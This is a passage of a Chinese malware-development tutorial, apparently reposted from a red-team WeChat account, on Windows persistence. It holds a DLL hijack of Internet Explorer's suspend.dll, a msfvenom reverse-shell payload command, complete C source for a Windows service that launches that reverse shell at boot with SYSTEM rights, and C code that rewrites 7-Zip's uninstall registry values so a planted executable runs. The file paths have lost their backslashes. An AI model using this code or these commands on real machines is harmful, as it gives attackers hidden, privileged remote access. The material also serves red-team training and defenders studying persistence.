03-DLL搜索顺序劫持
发现C:Program Filesinternet explorersuspend.dll
需要管理员权限把恶意dll文件复制到C:Program Filesinternet explorersuspend.dll,打开IE的时候dll会被加载运行,在windows11上仍可以成功
04-利用服务持久化
注册成服务,需要管理员权限
先生成反弹shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4445 -f exe > meow.exe再编写创建服务代码
#include <windows.h>
#include <stdio.h>
#define SLEEP_TIME 5000
SERVICE_STATUS serviceStatus;
SERVICE_STATUS_HANDLE hStatus;
void ServiceMain(int argc, char** argv);
void ControlHandler(DWORD request);
// run process meow.exe - reverse shell
int RunMeow() {
void * lb;
BOOL rv;
HANDLE th;
// for example: msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4445 -f exe > meow.exe
char cmd[] = "Z:\packtpub\chapter03\04-exploring-windows-services-for-persistence\meow.exe";
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi, sizeof(pi));
CreateProcess(NULL, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
WaitForSingleObject(pi.hProcess, INFINITE);
CloseHandle(pi.hProcess);
return 0;
}
int main() {
SERVICE_TABLE_ENTRY ServiceTable[] = {
{"MeowService", (LPSERVICE_MAIN_FUNCTION) ServiceMain},
{NULL, NULL}
};
StartServiceCtrlDispatcher(ServiceTable);
return 0;
}
void ServiceMain(int argc, char** argv) {
serviceStatus.dwServiceType = SERVICE_WIN32;
serviceStatus.dwCurrentState = SERVICE_START_PENDING;
serviceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
serviceStatus.dwWin32ExitCode = 0;
serviceStatus.dwServiceSpecificExitCode = 0;
serviceStatus.dwCheckPoint = 0;
serviceStatus.dwWaitHint = 0;
hStatus = RegisterServiceCtrlHandler("MeowService", (LPHANDLER_FUNCTION)ControlHandler);
RunMeow();
serviceStatus.dwCurrentState = SERVICE_RUNNING;
SetServiceStatus (hStatus, &serviceStatus);
while (serviceStatus.dwCurrentState == SERVICE_RUNNING) {
Sleep(SLEEP_TIME);
}
return;
}
void ControlHandler(DWORD request) {
switch(request) {
case SERVICE_CONTROL_STOP:
serviceStatus.dwWin32ExitCode = 0;
serviceStatus.dwCurrentState = SERVICE_STOPPED;
SetServiceStatus (hStatus, &serviceStatus);
return;
case SERVICE_CONTROL_SHUTDOWN:
serviceStatus.dwWin32ExitCode = 0;
serviceStatus.dwCurrentState = SERVICE_STOPPED;
SetServiceStatus (hStatus, &serviceStatus);
return;
default:
break;
}
SetServiceStatus(hStatus, &serviceStatus);
return;
}编译
x86_64-w64-mingw32-g++ -O2 meowsrv.c -o meowsrv.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive管理员权限添加服务
sc create MeowService binpath= "C:UsersadminDownloadsmeowsrv.exe" start= auto
添加成功后重启,服务会运行,且权限是系统权限
查看服务
sc query MeowService启动服务
sc start MeowService
系统权限
停止删除服务
sc stop MeowService
sc delete MeowService
注意meow.exe不是服务类型程序,作为服务需要使用meowsrv.exe,实战中更多的是更改现有服务而不是新建服务
05-其他持久化
卸载程序注册表项,关注下面注册表位置
HKLMSOFTWAREMicrosoftWindowsCurrentVersionUninstall<application name>
HKLMSOFTWAREMicrosoftWindowsCurrentVersionQuietUninstallString<application name>以7z为例,卸载的时候会运行Uninstall.exe
查询注册表
reg query "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionUninstall7-zip" /s
写一个helloword程序和一个修改注册表程序
#include <windows.h>
#pragma comment (lib, "user32.lib")
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
MessageBox(NULL, "Hello, Packt!", "=^..^=", MB_OK);
return 0;
}编译
x86_64-w64-mingw32-g++ -O2 hack.c -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive代码
#include <windows.h>
#include <string.h>
int main(int argc, char* argv[]) {
HKEY hkey = NULL;
// target app
const char* app = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-zip";
// evil app
const char* exe = "C:\Users\user\Desktop\packtpub\hack.exe";
// app
LONG res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)app, 0 , KEY_WRITE, &hkey);
if (res == ERROR_SUCCESS) {
// update registry key value
// reg add "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionUninstall7-zip" /v "UninstallString" /t REG_SZ /d "...hack.exe" /f
RegSetValueEx(hkey, (LPCSTR)"UninstallString", 0, REG_SZ, (unsigned char*)exe, strlen(exe));
RegSetValueEx(hkey, (LPCSTR)"QuietUninstallString", 0, REG_SZ, (unsigned char*)exe, strlen(exe));
RegCloseKey(hkey);
}
return 0;
}编译
x86_64-w64-mingw32-g++ -O2 pers.c -o pers.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive管理员运行后,查看注册表
卸载7z的时候hack.exe会运行
父进程是SystemSettings.exe
还原注册表
reg add "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionUninstall7-zip" /v "UninstallString" /t REG_SZ /d "C:Program Files7-zipUninstall.exe" /f
reg add "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionUninstall7-zip" /v "QuietUninstallString" /t REG_SZ /d "C:Program Files7-zipUninstall.exe" /f
原文始发于微信公众号(高级红队专家):【MalDev-05】持久化基础与实战-2
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论